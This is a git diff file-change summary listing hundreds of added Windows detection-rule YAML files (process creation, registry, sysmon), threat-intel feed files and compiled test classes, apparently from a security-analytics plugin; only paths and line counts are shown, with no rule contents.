+ .../proc_creation_win_sdclt_child_process.yml | 23 + .../proc_creation_win_sdelete.yml | 32 + ...roc_creation_win_sdiagnhost_susp_child.yml | 30 + .../proc_creation_win_service_execution.yml | 25 + .../proc_creation_win_service_stop.yml | 38 + ...ion_win_set_policies_to_unsecure_level.yml | 33 + ...ation_win_shadow_copies_access_symlink.yml | 25 + ...oc_creation_win_shadow_copies_creation.yml | 31 + ...oc_creation_win_shadow_copies_deletion.yml | 64 + .../proc_creation_win_shell_spawn_by_java.yml | 26 + ..._creation_win_shell_spawn_susp_program.yml | 56 + ...c_creation_win_silenttrinity_stage_use.yml | 22 + .../proc_creation_win_software_discovery.yml | 31 + ...oc_creation_win_soundrec_audio_capture.yml | 24 + .../proc_creation_win_spn_enum.yml | 28 + .../proc_creation_win_sqlcmd_veeam_dump.yml | 27 + ...oc_creation_win_sqlite_firefox_cookies.yml | 24 + ..._unauthenticated_privileged_cmd_access.yml | 26 + ...c_creation_win_stickykey_like_backdoor.yml | 37 + .../proc_creation_win_stordiag_execution.yml | 30 + .../proc_creation_win_sus_auditpol_usage.yml | 28 + .../proc_creation_win_susp_7z.yml | 34 + .../proc_creation_win_susp_ad_reco.yml | 28 + ...ation_win_susp_add_user_remote_desktop.yml | 31 + .../proc_creation_win_susp_adfind.yml | 33 + ...roc_creation_win_susp_adfind_enumerate.yml | 36 + .../proc_creation_win_susp_adidnsdump.yml | 24 + .../proc_creation_win_susp_advancedrun.yml | 29 + ...reation_win_susp_advancedrun_priv_user.yml | 35 + ...susp_athremotefxvgpudisablementcommand.yml | 37 + .../proc_creation_win_susp_base64_invoke.yml | 46 + .../proc_creation_win_susp_base64_load.yml | 54 + .../proc_creation_win_susp_bcdedit.yml | 29 + .../proc_creation_win_susp_bginfo.yml | 29 + .../proc_creation_win_susp_bitstransfer.yml | 32 + .../proc_creation_win_susp_calc.yml | 26 + .../proc_creation_win_susp_cdb.yml | 32 + ...roc_creation_win_susp_certutil_command.yml | 54 + ...proc_creation_win_susp_certutil_encode.yml | 26 + .../proc_creation_win_susp_char_in_cmd.yml | 30 + ...tion_win_susp_child_process_as_system_.yml | 39 + .../proc_creation_win_susp_cipher.yml | 24 + .../proc_creation_win_susp_cli_escape.yml | 29 + ...roc_creation_win_susp_cmd_http_appdata.yml | 33 + ...reation_win_susp_cmd_shadowcopy_access.yml | 22 + ...proc_creation_win_susp_codepage_lookup.yml | 32 + ...proc_creation_win_susp_codepage_switch.yml | 32 + ...oc_creation_win_susp_commandline_chars.yml | 29 + ...ation_win_susp_commands_recon_activity.yml | 45 + ...c_creation_win_susp_compression_params.yml | 34 + ...roc_creation_win_susp_comsvcs_procdump.yml | 35 + .../proc_creation_win_susp_conhost.yml | 28 + .../proc_creation_win_susp_conhost_option.yml | 25 + ...eation_win_susp_control_cve_2021_40444.yml | 32 + ...roc_creation_win_susp_control_dll_load.yml | 28 + ...reation_win_susp_copy_lateral_movement.yml | 46 + .../proc_creation_win_susp_copy_system32.yml | 29 + .../proc_creation_win_susp_covenant.yml | 35 + ...eation_win_susp_crackmapexec_execution.yml | 40 + ...c_creation_win_susp_crackmapexec_flags.yml | 66 + ...sp_crackmapexec_powershell_obfuscation.yml | 38 + .../proc_creation_win_susp_csc.yml | 30 + .../proc_creation_win_susp_csc_folder.yml | 37 + .../proc_creation_win_susp_cscript_vbs.yml | 22 + .../proc_creation_win_susp_csi.yml | 38 + .../proc_creation_win_susp_curl_download.yml | 50 + ...proc_creation_win_susp_curl_fileupload.yml | 38 + ...roc_creation_win_susp_curl_start_combo.yml | 33 + .../proc_creation_win_susp_curl_useragent.yml | 31 + ...creation_win_susp_dctask64_proc_inject.yml | 30 + .../proc_creation_win_susp_del.yml | 29 + ...oc_creation_win_susp_desktopimgdownldr.yml | 35 + .../proc_creation_win_susp_devinit_lolbin.yml | 24 + ...roc_creation_win_susp_devtoolslauncher.yml | 24 + .../proc_creation_win_susp_dir.yml | 24 + ...susp_direct_asep_reg_keys_modification.yml | 39 + ...roc_creation_win_susp_disable_eventlog.yml | 31 + ..._creation_win_susp_disable_ie_features.yml | 32 + ...proc_creation_win_susp_disable_raccine.yml | 34 + .../proc_creation_win_susp_diskshadow.yml | 29 + .../proc_creation_win_susp_ditsnap.yml | 25 + .../proc_creation_win_susp_dllhost_no_cli.yml | 26 + .../proc_creation_win_susp_dnx.yml | 24 + ...roc_creation_win_susp_double_extension.yml | 34 + ...eation_win_susp_download_office_domain.yml | 29 + ...c_creation_win_susp_dtrace_kernel_dump.yml | 24 + ...ion_win_susp_emotet_rundll32_execution.yml | 34 + ...proc_creation_win_susp_esentutl_params.yml | 31 + .../proc_creation_win_susp_eventlog_clear.yml | 40 + .../proc_creation_win_susp_execution_path.yml | 49 + ...tion_win_susp_execution_path_webserver.yml | 33 + .../proc_creation_win_susp_explorer.yml | 24 + ...ation_win_susp_explorer_break_proctree.yml | 26 + ..._creation_win_susp_explorer_nouaccheck.yml | 27 + ...creation_win_susp_file_characteristics.yml | 35 + ...p_file_download_via_gfxdownloadwrapper.yml | 28 + .../proc_creation_win_susp_findstr_385201.yml | 22 + .../proc_creation_win_susp_findstr_lnk.yml | 29 + .../proc_creation_win_susp_finger_usage.yml | 23 + ...roc_creation_win_susp_firewall_disable.yml | 37 + .../proc_creation_win_susp_format.yml | 29 + .../proc_creation_win_susp_fsutil_usage.yml | 31 + .../proc_creation_win_susp_ftp.yml | 33 + .../proc_creation_win_susp_gpresult.yml | 27 + .../proc_creation_win_susp_gup.yml | 28 + .../proc_creation_win_susp_gup_download.yml | 28 + .../proc_creation_win_susp_gup_execution.yml | 24 + .../proc_creation_win_susp_hostname.yml | 22 + .../proc_creation_win_susp_image_missing.yml | 34 + .../proc_creation_win_susp_instalutil.yml | 26 + ...c_creation_win_susp_iss_module_install.yml | 26 + .../proc_creation_win_susp_lsass_clone.yml | 25 + .../proc_creation_win_susp_machineguid.yml | 25 + ...eation_win_susp_mounted_share_deletion.yml | 26 + .../proc_creation_win_susp_mpiexec_lolbin.yml | 30 + ...proc_creation_win_susp_mshta_execution.yml | 41 + .../proc_creation_win_susp_mshta_pattern.yml | 48 + .../proc_creation_win_susp_msiexec_cwd.yml | 27 + ..._creation_win_susp_msiexec_web_install.yml | 26 + .../proc_creation_win_susp_msoffice.yml | 28 + .../proc_creation_win_susp_net_execution.yml | 54 + ...on_win_susp_net_use_password_plaintext.yml | 26 + .../proc_creation_win_susp_netsh_command.yml | 31 + ...reation_win_susp_netsh_dll_persistence.yml | 32 + ...proc_creation_win_susp_network_command.yml | 28 + ...n_win_susp_network_listing_connections.yml | 31 + .../proc_creation_win_susp_ngrok_pua.yml | 44 + .../proc_creation_win_susp_nmap.yml | 22 + .../proc_creation_win_susp_non_exe_image.yml | 88 + ...in_susp_nt_resource_kit_auditpol_usage.yml | 28 + ..._creation_win_susp_ntdll_type_redirect.yml | 24 + .../proc_creation_win_susp_ntds.yml | 65 + .../proc_creation_win_susp_ntdsutil.yml | 22 + .../proc_creation_win_susp_ntlmrelay.yml | 30 + .../proc_creation_win_susp_odbcconf.yml | 30 + .../proc_creation_win_susp_openwith.yml | 24 + .../proc_creation_win_susp_outlook.yml | 30 + .../proc_creation_win_susp_outlook_temp.yml | 23 + .../proc_creation_win_susp_parents.yml | 40 + .../proc_creation_win_susp_pcwutl.yml | 26 + .../proc_creation_win_susp_pester.yml | 36 + .../proc_creation_win_susp_ping_hex_ip.yml | 27 + ...creation_win_susp_plink_remote_forward.yml | 25 + ...ation_win_susp_powershell_cmd_patterns.yml | 35 + ...n_win_susp_powershell_download_cradles.yml | 21 + ...ation_win_susp_powershell_download_iex.yml | 33 + ...tion_win_susp_powershell_empire_launch.yml | 31 + ..._win_susp_powershell_empire_uac_bypass.yml | 30 + ...c_creation_win_susp_powershell_enc_cmd.yml | 43 + ...oc_creation_win_susp_powershell_encode.yml | 32 + ...tion_win_susp_powershell_encoded_param.yml | 24 + ...n_win_susp_powershell_getprocess_lsass.yml | 21 + ...ion_win_susp_powershell_hidden_b64_cmd.yml | 73 + ...ation_win_susp_powershell_iex_patterns.yml | 40 + ...ation_win_susp_powershell_parent_combo.yml | 31 + ...ion_win_susp_powershell_parent_process.yml | 60 + ...reation_win_susp_powershell_sam_access.yml | 32 + ...tion_win_susp_powershell_sub_processes.yml | 34 + ...n_win_susp_powershell_webclient_casing.yml | 168 + ...oc_creation_win_susp_pressynkey_lolbin.yml | 28 + .../proc_creation_win_susp_print.yml | 30 + .../proc_creation_win_susp_procdump.yml | 26 + .../proc_creation_win_susp_procdump_lsass.yml | 32 + .../proc_creation_win_susp_progname.yml | 64 + .../proc_creation_win_susp_ps_appdata.yml | 32 + ...proc_creation_win_susp_ps_downloadfile.yml | 28 + .../proc_creation_win_susp_psexec_eula.yml | 27 + ...win_susp_psexex_paexec_escalate_system.yml | 29 + ..._creation_win_susp_psexex_paexec_flags.yml | 37 + .../proc_creation_win_susp_psloglist.yml | 41 + ...ation_win_susp_psr_capture_screenshots.yml | 25 + .../proc_creation_win_susp_radmin.yml | 25 + .../proc_creation_win_susp_rar_flags.yml | 29 + ...roc_creation_win_susp_rasdial_activity.yml | 23 + ...ation_win_susp_razorinstaller_explorer.yml | 26 + ...roc_creation_win_susp_rclone_execution.yml | 63 + .../proc_creation_win_susp_recon.yml | 27 + .../proc_creation_win_susp_recon_activity.yml | 34 + ...c_creation_win_susp_recon_net_activity.yml | 25 + ...ation_win_susp_redir_local_admin_share.yml | 21 + .../proc_creation_win_susp_reg_bitlocker.yml | 36 + ...tion_win_susp_reg_disable_sec_services.yml | 72 + ...roc_creation_win_susp_reg_open_command.yml | 38 + ...tion_win_susp_regedit_trustedinstaller.yml | 24 + ...creation_win_susp_register_cimprovider.yml | 29 + ...tion_win_susp_registration_via_cscript.yml | 32 + ...c_creation_win_susp_regsvr32_anomalies.yml | 74 + ...oc_creation_win_susp_regsvr32_explorer.yml | 23 + ...eation_win_susp_regsvr32_flags_anomaly.yml | 28 + ...reation_win_susp_regsvr32_http_pattern.yml | 35 + .../proc_creation_win_susp_regsvr32_image.yml | 23 + ...proc_creation_win_susp_regsvr32_no_dll.yml | 38 + ...roc_creation_win_susp_renamed_dctask64.yml | 33 + ...oc_creation_win_susp_renamed_debugview.yml | 27 + .../proc_creation_win_susp_renamed_paexec.yml | 29 + .../proc_creation_win_susp_rpcping.yml | 42 + .../proc_creation_win_susp_run_folder.yml | 33 + .../proc_creation_win_susp_run_locations.yml | 34 + ...oc_creation_win_susp_rundll32_activity.yml | 81 + ..._creation_win_susp_rundll32_by_ordinal.yml | 35 + ..._creation_win_susp_rundll32_inline_vbs.yml | 25 + ...in_susp_rundll32_js_runhtmlapplication.yml | 25 + ...proc_creation_win_susp_rundll32_keymgr.yml | 24 + ...c_creation_win_susp_rundll32_no_params.yml | 30 + ..._creation_win_susp_rundll32_script_run.yml | 28 + ...p_rundll32_setupapi_installhinfsection.yml | 34 + ...ation_win_susp_rundll32_spawn_explorer.yml | 25 + .../proc_creation_win_susp_rundll32_sys.yml | 25 + ..._creation_win_susp_rundll32_user32_dll.yml | 27 + ...oc_creation_win_susp_runonce_execution.yml | 27 + ...proc_creation_win_susp_runscripthelper.yml | 28 + .../proc_creation_win_susp_sc_query.yml | 21 + ...roc_creation_win_susp_schtask_creation.yml | 33 + ..._win_susp_schtask_creation_temp_folder.yml | 30 + ...roc_creation_win_susp_schtasks_disable.yml | 28 + ..._creation_win_susp_schtasks_env_folder.yml | 45 + ...eation_win_susp_schtasks_folder_combos.yml | 31 + ...proc_creation_win_susp_schtasks_parent.yml | 32 + ...roc_creation_win_susp_schtasks_pattern.yml | 50 + ...c_creation_win_susp_schtasks_user_temp.yml | 30 + ...creation_win_susp_screenconnect_access.yml | 26 + ...proc_creation_win_susp_screensaver_reg.yml | 53 + ...n_win_susp_script_exec_from_env_folder.yml | 47 + ...reation_win_susp_script_exec_from_temp.yml | 40 + ...roc_creation_win_susp_script_execution.yml | 31 + ...ion_win_susp_service_dacl_modification.yml | 33 + .../proc_creation_win_susp_service_dir.yml | 35 + ...creation_win_susp_service_modification.yml | 35 + ...ion_win_susp_service_path_modification.yml | 33 + ...susp_servu_exploitation_cve_2021_35211.yml | 29 + ...reation_win_susp_servu_process_pattern.yml | 37 + .../proc_creation_win_susp_sharpview.yml | 155 + ..._creation_win_susp_shell_spawn_by_java.yml | 43 + ...n_win_susp_shell_spawn_by_java_keytool.yml | 44 + ...eation_win_susp_shell_spawn_from_mssql.yml | 32 + ...eation_win_susp_shell_spawn_from_winrm.yml | 32 + ...proc_creation_win_susp_shimcache_flush.yml | 39 + .../proc_creation_win_susp_shutdown.yml | 25 + .../proc_creation_win_susp_splwow64.yml | 23 + ...ation_win_susp_spoolsv_child_processes.yml | 81 + ...proc_creation_win_susp_squirrel_lolbin.yml | 66 + .../proc_creation_win_susp_svchost.yml | 37 + .../proc_creation_win_susp_svchost_no_cli.yml | 32 + ...proc_creation_win_susp_sysprep_appdata.yml | 24 + ..._creation_win_susp_system_user_anomaly.yml | 74 + .../proc_creation_win_susp_systeminfo.yml | 22 + .../proc_creation_win_susp_sysvol_access.yml | 25 + .../proc_creation_win_susp_takeown.yml | 29 + ...ation_win_susp_target_location_shell32.yml | 32 + .../proc_creation_win_susp_taskkill.yml | 27 + ...roc_creation_win_susp_tasklist_command.yml | 22 + ..._creation_win_susp_taskmgr_localsystem.yml | 23 + .../proc_creation_win_susp_taskmgr_parent.yml | 29 + ...oc_creation_win_susp_tracker_execution.yml | 28 + ...ation_win_susp_trolleyexpress_procdump.yml | 43 + ...oc_creation_win_susp_tscon_localsystem.yml | 27 + ...c_creation_win_susp_tscon_rdp_redirect.yml | 25 + ...eation_win_susp_uac_bypass_trustedpath.yml | 23 + ...reation_win_susp_use_of_csharp_console.yml | 24 + ...roc_creation_win_susp_use_of_sqlps_bin.yml | 32 + ...reation_win_susp_use_of_sqltoolsps_bin.yml | 31 + .../proc_creation_win_susp_use_of_te_bin.yml | 27 + ...tion_win_susp_use_of_vsjitdebugger_bin.yml | 28 + .../proc_creation_win_susp_userinit_child.yml | 30 + .../proc_creation_win_susp_vaultcmd.yml | 25 + .../proc_creation_win_susp_vboxdrvinst.yml | 31 + ...roc_creation_win_susp_vbscript_unc2452.yml | 28 + ...proc_creation_win_susp_volsnap_disable.yml | 25 + ...proc_creation_win_susp_web_request_cmd.yml | 29 + ...ation_win_susp_webdav_client_execution.yml | 26 + ...proc_creation_win_susp_where_execution.yml | 41 + .../proc_creation_win_susp_whoami.yml | 27 + .../proc_creation_win_susp_whoami_anomaly.yml | 43 + ...proc_creation_win_susp_whoami_as_param.yml | 22 + .../proc_creation_win_susp_winrar_dmp.yml | 27 + ...roc_creation_win_susp_winrar_execution.yml | 30 + ...roc_creation_win_susp_winrm_awl_bypass.yml | 32 + ...proc_creation_win_susp_winrm_execution.yml | 30 + .../proc_creation_win_susp_winzip.yml | 30 + .../proc_creation_win_susp_wmi_execution.yml | 43 + ...ion_win_susp_wmic_eventconsumer_create.yml | 27 + ...ion_win_susp_wmic_proc_create_rundll32.yml | 27 + ...n_susp_wmic_security_product_uninstall.yml | 55 + .../proc_creation_win_susp_workfolders.yml | 25 + .../proc_creation_win_susp_wuauclt.yml | 34 + ...proc_creation_win_susp_wuauclt_cmdline.yml | 22 + .../proc_creation_win_susp_zip_compress.yml | 29 + .../proc_creation_win_susp_zipexec.yml | 33 + ...reation_win_sysinternals_eula_accepted.yml | 26 + ...oc_creation_win_sysinternals_psservice.yml | 25 + ...proc_creation_win_sysmon_driver_unload.yml | 30 + ...reation_win_sysmon_uac_bypass_eventvwr.yml | 33 + .../proc_creation_win_system_exe_anomaly.yml | 81 + ...c_creation_win_tap_installer_execution.yml | 20 + .../proc_creation_win_task_folder_evasion.yml | 36 + .../proc_creation_win_termserv_proc_spawn.yml | 32 + .../proc_creation_win_tool_nircmd.yml | 42 + ...roc_creation_win_tool_nircmd_as_system.yml | 27 + ...proc_creation_win_tool_nsudo_execution.yml | 50 + .../proc_creation_win_tool_psexec.yml | 38 + .../proc_creation_win_tool_runx_as_system.yml | 28 + .../proc_creation_win_tools_relay_attacks.yml | 55 + .../proc_creation_win_tor_browser.yml | 23 + .../proc_creation_win_trust_discovery.yml | 42 + ..._creation_win_uac_bypass_changepk_slui.yml | 28 + .../proc_creation_win_uac_bypass_cleanmgr.yml | 26 + .../proc_creation_win_uac_bypass_cmstp.yml | 36 + ...eation_win_uac_bypass_computerdefaults.yml | 29 + ...eation_win_uac_bypass_consent_comctl32.yml | 26 + .../proc_creation_win_uac_bypass_dismhost.yml | 28 + ...proc_creation_win_uac_bypass_fodhelper.yml | 27 + ...ion_win_uac_bypass_idiagnostic_profile.yml | 27 + .../proc_creation_win_uac_bypass_ieinstal.yml | 27 + ...c_creation_win_uac_bypass_msconfig_gui.yml | 26 + ...tion_win_uac_bypass_ntfs_reparse_point.yml | 36 + ...oc_creation_win_uac_bypass_pkgmgr_dism.yml | 26 + .../proc_creation_win_uac_bypass_winsat.yml | 26 + .../proc_creation_win_uac_bypass_wmp.yml | 31 + .../proc_creation_win_uac_bypass_wsreset.yml | 25 + ...win_uac_bypass_wsreset_integrity_level.yml | 27 + ...ation_win_uninstall_crowdstrike_falcon.yml | 29 + .../proc_creation_win_uninstall_sysmon.yml | 24 + ..._change_sevice_image_path_by_non_admin.yml | 34 + ..._creation_win_using_sc_to_hide_sevices.yml | 30 + ...on_win_using_settingsynchost_as_lolbin.yml | 33 + .../proc_creation_win_verclsid_runs_com.yml | 30 + ...eation_win_vmtoolsd_susp_child_process.yml | 48 + ...creation_win_vul_java_remote_debugging.yml | 26 + .../proc_creation_win_webshell_detection.yml | 96 + .../proc_creation_win_webshell_hacking.yml | 98 + ..._creation_win_webshell_recon_detection.yml | 52 + .../proc_creation_win_webshell_spawn.yml | 54 + .../proc_creation_win_whoami_as_priv_user.yml | 27 + .../proc_creation_win_whoami_as_system.yml | 28 + .../proc_creation_win_whoami_priv.yml | 26 + ...roc_creation_win_win10_sched_task_0day.yml | 30 + ...eation_win_win_exchange_transportagent.yml | 24 + .../proc_creation_win_winword_dll_load.yml | 26 + ..._wmi_backdoor_exchange_transport_agent.yml | 25 + ..._wmi_persistence_script_event_consumer.yml | 24 + ...proc_creation_win_wmi_spwns_powershell.yml | 32 + .../proc_creation_win_wmic_hotfix_enum.yml | 28 + .../proc_creation_win_wmic_reconnaissance.yml | 32 + .../proc_creation_win_wmic_remote_command.yml | 30 + .../proc_creation_win_wmic_remote_service.yml | 32 + ...c_creation_win_wmic_remove_application.yml | 25 + .../proc_creation_win_wmic_service.yml | 29 + ...ation_win_wmic_unquoted_service_search.yml | 32 + ...creation_win_wmiprvse_spawning_process.yml | 34 + .../proc_creation_win_workflow_compiler.yml | 31 + ...win_write_protect_for_storage_disabled.yml | 27 + .../proc_creation_win_wsreset_uac_bypass.yml | 27 + .../proc_creation_win_xordump.yml | 27 + ...roc_creation_win_xsl_script_processing.yml | 37 + ...w_disk_access_using_illegitimate_tools.yml | 66 + ...gon_scripts_userinitmprlogonscript_reg.yml | 25 + .../registry_add/registry_add_mal_netwire.yml | 31 + .../registry_add/registry_add_mal_ursnif.yml | 30 + .../registry_add_persistence_key_linking.yml | 26 + ...egistry_add_sysinternals_eula_accepted.yml | 24 + ...add_sysinternals_sdelete_registry_keys.yml | 24 + .../registry_delete_mstsc_history_cleared.yml | 28 + ...istry_delete_removal_amsi_registry_key.yml | 27 + ...ete_removal_com_hijacking_registry_key.yml | 39 + ...e_removal_sd_value_scheduled_task_hide.yml | 25 + .../registry_event_add_local_hidden_user.yml | 24 + .../registry_event_apt_chafer_mar18.yml | 34 + .../registry_event_apt_leviathan.yml | 20 + ...registry_event_apt_oceanlotus_registry.yml | 44 + .../registry_event_apt_pandemic.yml | 30 + .../registry_event_bypass_via_wsreset.yml | 29 + ...stry_event_cmstp_execution_by_registry.yml | 29 + .../registry_event_crashdump_disabled.yml | 23 + ...cve_2021_31979_cve_2021_33771_exploits.yml | 33 + ...y_events_logging_adding_reg_key_minint.yml | 32 + ...event_disable_wdigest_credential_guard.yml | 22 + ...egistry_event_dns_serverlevelplugindll.yml | 31 + ...entutl_volume_shadow_copy_service_keys.yml | 25 + .../registry_event_hack_wce_reg.yml | 23 + ...t_hybridconnectionmgr_svc_installation.yml | 25 + .../registry_event_mal_azorult.yml | 30 + .../registry_event_mal_flowcloud.yml | 27 + ...gistry_event_mimikatz_printernightmare.yml | 41 + ...y_event_modify_screensaver_binary_path.yml | 28 + ...ry_event_narrator_feedback_persistance.yml | 26 + .../registry_event_net_ntlm_downgrade.yml | 30 + ..._dll_added_to_appcertdlls_registry_key.yml | 31 + ...dll_added_to_appinit_dlls_registry_key.yml | 36 + .../registry_event_office_test_regadd.yml | 24 + ...registry_event_persistence_recycle_bin.yml | 25 + .../registry_event_portproxy_registry_key.yml | 27 + .../registry_event_redmimicry_winnti_reg.yml | 22 + .../registry_event_runkey_winekey.yml | 27 + .../registry_event_runonce_persistence.yml | 32 + ...try_event_shell_open_keys_manipulation.yml | 38 + ...registry_event_silentprocessexit_lsass.yml | 22 + .../registry_event_ssp_added_lsa_config.yml | 28 + ...registry_event_stickykey_like_backdoor.yml | 32 + .../registry_event_susp_atbroker_change.yml | 27 + .../registry_event_susp_download_run_key.yml | 26 + .../registry_event_susp_lsass_dll_load.yml | 31 + .../registry_event_susp_mic_cam_access.yml | 37 + ...gistry_event_trust_record_modification.yml | 23 + ...sing_windows_telemetry_for_persistence.yml | 44 + ...stry_set_add_load_service_in_safe_mode.yml | 33 + .../registry_set_add_port_monitor.yml | 33 + ...set_asep_reg_keys_modification_classes.yml | 58 + ..._set_asep_reg_keys_modification_common.yml | 79 + ...eg_keys_modification_currentcontrolset.yml | 54 + ...p_reg_keys_modification_currentversion.yml | 120 + ...eg_keys_modification_currentversion_nt.yml | 84 + ...eg_keys_modification_internet_explorer.yml | 54 + ..._set_asep_reg_keys_modification_office.yml | 75 + ..._reg_keys_modification_session_manager.yml | 44 + ...p_reg_keys_modification_system_scripts.yml | 42 + ...et_asep_reg_keys_modification_winsock2.yml | 42 + ...asep_reg_keys_modification_wow6432node.yml | 83 + ..._keys_modification_wow6432node_classes.yml | 50 + ...odification_wow6432node_currentversion.yml | 43 + .../registry_set_blackbyte_ransomware.yml | 28 + ...y_set_bypass_uac_using_delegateexecute.yml | 27 + ...istry_set_bypass_uac_using_eventviewer.yml | 26 + ...et_bypass_uac_using_silentcleanup_task.yml | 26 + .../registry_set_change_rdp_port.yml | 28 + .../registry_set_change_security_zones.yml | 29 + .../registry_set_chrome_extension.yml | 132 + ...stry_set_cobaltstrike_service_installs.yml | 38 + .../registry_set_comhijack_sdclt.yml | 25 + ...istry_set_creation_service_susp_folder.yml | 40 + ...istry_set_creation_service_temp_folder.yml | 34 + ...y_set_creation_service_uncommon_folder.yml | 46 + ...file_open_handler_powershell_execution.yml | 25 + ...try_set_cve_2020_1048_new_printer_port.yml | 31 + ...gistry_set_cve_2022_30190_msdt_follina.yml | 23 + .../registry_set_defender_disabled.yml | 38 + .../registry_set_defender_exclusions.yml | 27 + ..._defender_realtime_protection_disabled.yml | 37 + .../registry_set_dhcp_calloutdll.yml | 28 + ...istry_set_disable_administrative_share.yml | 27 + ...registry_set_disable_defender_firewall.yml | 28 + .../registry_set_disable_fonction_user.yml | 40 + ...ble_microsoft_office_security_features.yml | 37 + .../registry_set_disable_system_restore.yml | 29 + .../registry_set_disable_uac_registry.yml | 25 + .../registry_set_disable_winevt_logging.yml | 27 + ...it_guard_net_protection_on_ms_defender.yml | 24 + ...t_disabled_microsoft_defender_eventlog.yml | 23 + ...d_pua_protection_on_microsoft_defender.yml | 24 + ...amper_protection_on_microsoft_defender.yml | 29 + .../registry_set_dns_over_https_enabled.yml | 36 + ...et_enabling_cor_profiler_env_variables.yml | 27 + .../registry_set_enabling_turnoffcheck.yml | 23 + .../registry_set_etw_disabled.yml | 32 + .../registry_set_file_association_exefile.yml | 23 + .../registry_set_globalflags_persistence.yml | 35 + .../registry_set_hidden_extention.yml | 30 + .../registry_set/registry_set_hide_file.yml | 26 + .../registry_set_hide_fonction_user.yml | 35 + .../registry_set_ie_persistence.yml | 37 + ...stry_set_install_root_or_ca_certificat.yml | 35 + ...y_set_lolbin_onedrivestandaloneupdater.yml | 24 + .../registry_set/registry_set_mal_adwind.yml | 27 + .../registry_set_mal_blue_mockingbird.yml | 27 + ...registry_set_new_application_appcompat.yml | 26 + .../registry_set_office_enable_dde.yml | 32 + .../registry_set_office_security.yml | 28 + .../registry_set_office_vsto_persistence.yml | 42 + .../registry_set_outlook_c2_registry_key.yml | 27 + ...egistry_set_outlook_registry_todaypage.yml | 37 + .../registry_set_outlook_registry_webview.yml | 33 + .../registry_set_outlook_security.yml | 26 + .../registry_set_persistence_search_order.yml | 78 + .../registry_set_powershell_as_service.yml | 27 + .../registry_set_powershell_in_run_keys.yml | 33 + ...gistry_set_powershell_logging_disabled.yml | 28 + ...registry_set_rdp_registry_modification.yml | 31 + .../registry_set_rdp_settings_hijack.yml | 31 + ...stry_set_scr_file_executed_by_rundll32.yml | 32 + .../registry_set_set_nopolicies_user.yml | 34 + .../registry_set_set_servicedll.yml | 32 + ...egistry_set_shim_databases_persistence.yml | 30 + .../registry_set_silentprocessexit.yml | 25 + .../registry_set_susp_printer_driver.yml | 29 + ...stry_set_susp_reg_persist_explorer_run.yml | 36 + .../registry_set_susp_run_key_img_folder.yml | 40 + .../registry_set_susp_service_installed.yml | 33 + .../registry_set_taskcache_entry.yml | 36 + .../registry_set_telemetry_persistence.yml | 31 + .../registry_set_timeproviders_dllname.yml | 27 + .../registry_set_uac_bypass_eventvwr.yml | 26 + .../registry_set_uac_bypass_sdclt.yml | 30 + .../registry_set_uac_bypass_winsat.yml | 27 + .../registry_set_uac_bypass_wmp.yml | 25 + .../registry_set_vbs_payload_stored.yml | 43 + .../registry_set_wab_dllpath_reg_change.yml | 27 + ..._set_wdigest_enable_uselogoncredential.yml | 25 + .../registry_set_winlogon_notify_key.yml | 26 + ...napi_in_powershell_credentials_dumping.yml | 26 + .../sysmon/sysmon_config_modification.yml | 24 + .../sysmon_config_modification_error.yml | 33 + .../sysmon_config_modification_status.yml | 25 + .../sysmon_dcom_iertutil_dll_hijack.yml | 29 + .../sysmon/sysmon_process_hollowing.yml | 32 + .../sysmon_wmi_event_subscription.yml | 23 + .../sysmon_wmi_susp_encoded_scripts.yml | 29 + .../wmi_event/sysmon_wmi_susp_scripting.yml | 44 + bin/main/threatIntelFeed/feedMetadata.json | 13 + bin/main/threatIntelFeedInfo/feodo.yml | 6 + bin/test/OSMapping/windows/fieldmappings.yml | 6 + bin/test/OSMapping/windows/mappings.json | 8 + bin/test/ad_ldap-sample.json | 22 + bin/test/azure-sample.json | 27 + bin/test/cloudtrail-sample.json | 31 + bin/test/dns-sample.json | 26 + .../DetectorThreatIntelIT.class | Bin 0 -> 20970 bytes .../LogTypeServiceTests$TestPlugin.class | Bin 0 -> 971 bytes .../LogTypeServiceTests.class | Bin 0 -> 7717 bytes .../SecurityAnalyticsClientUtils.class | Bin 0 -> 6598 bytes .../SecurityAnalyticsPluginRestApiIT.class | Bin 0 -> 3553 bytes .../SecurityAnalyticsRestTestCase.class | Bin 0 -> 71185 bytes .../TestHelpers$AccessRoles.class | Bin 0 -> 549 bytes .../securityanalytics/TestHelpers.class | Bin 0 -> 53685 bytes .../action/AckAlertsRequestTests.class | Bin 0 -> 2559 bytes .../action/AckAlertsResponseTests.class | Bin 0 -> 3752 bytes .../CreateIndexMappingsRequestTests.class | Bin 0 -> 2151 bytes .../action/GetDetectorActionTests.class | Bin 0 -> 894 bytes .../action/GetDetectorRequestTests.class | Bin 0 -> 2125 bytes .../action/GetIndexMappingsRequestTests.class | Bin 0 -> 2071 bytes .../GetIndexMappingsResponseTests.class | Bin 0 -> 4511 bytes .../action/IndexDetectorActionTests.class | Bin 0 -> 906 bytes .../action/IndexDetectorRequestTests.class | Bin 0 -> 4859 bytes .../action/IndexDetectorResponseTests.class | Bin 0 -> 4666 bytes .../UpdateIndexMappingsRequestTests.class | Bin 0 -> 2201 bytes .../action/ValidateRulesRequestTests.class | Bin 0 -> 3776 bytes .../action/ValidateRulesResponseTests.class | Bin 0 -> 4728 bytes .../alerts/AlertingServiceTests$1.class | Bin 0 -> 1675 bytes .../alerts/AlertingServiceTests$2.class | Bin 0 -> 1739 bytes .../alerts/AlertingServiceTests$3.class | Bin 0 -> 1723 bytes .../alerts/AlertingServiceTests.class | Bin 0 -> 12182 bytes .../securityanalytics/alerts/AlertsIT.class | Bin 0 -> 28006 bytes .../alerts/SecureAlertsRestApiIT.class | Bin 0 -> 15338 bytes ...orrelationEngineRestApiIT$LogIndices.class | Bin 0 -> 700 bytes .../CorrelationEngineRestApiIT.class | Bin 0 -> 23656 bytes .../CorrelationEngineRuleRestApiIT.class | Bin 0 -> 6148 bytes .../correlation/LuceneEngineIT.class | Bin 0 -> 7210 bytes .../findings/FindingDtoTests.class | Bin 0 -> 2251 bytes .../findings/FindingIT.class | Bin 0 -> 14911 bytes .../findings/FindingServiceTests$1.class | Bin 0 -> 1695 bytes .../findings/FindingServiceTests$2.class | Bin 0 -> 1752 bytes .../findings/FindingServiceTests$3.class | Bin 0 -> 1737 bytes .../findings/FindingServiceTests.class | Bin 0 -> 10334 bytes .../findings/SecureFindingRestApiIT.class | Bin 0 -> 13195 bytes .../mapper/MapperRestApiIT$1.class | Bin 0 -> 1541 bytes .../mapper/MapperRestApiIT.class | Bin 0 -> 42654 bytes .../mapper/MapperServiceTests.class | Bin 0 -> 381 bytes .../mapper/MappingsTraverserTests$1.class | Bin 0 -> 1493 bytes 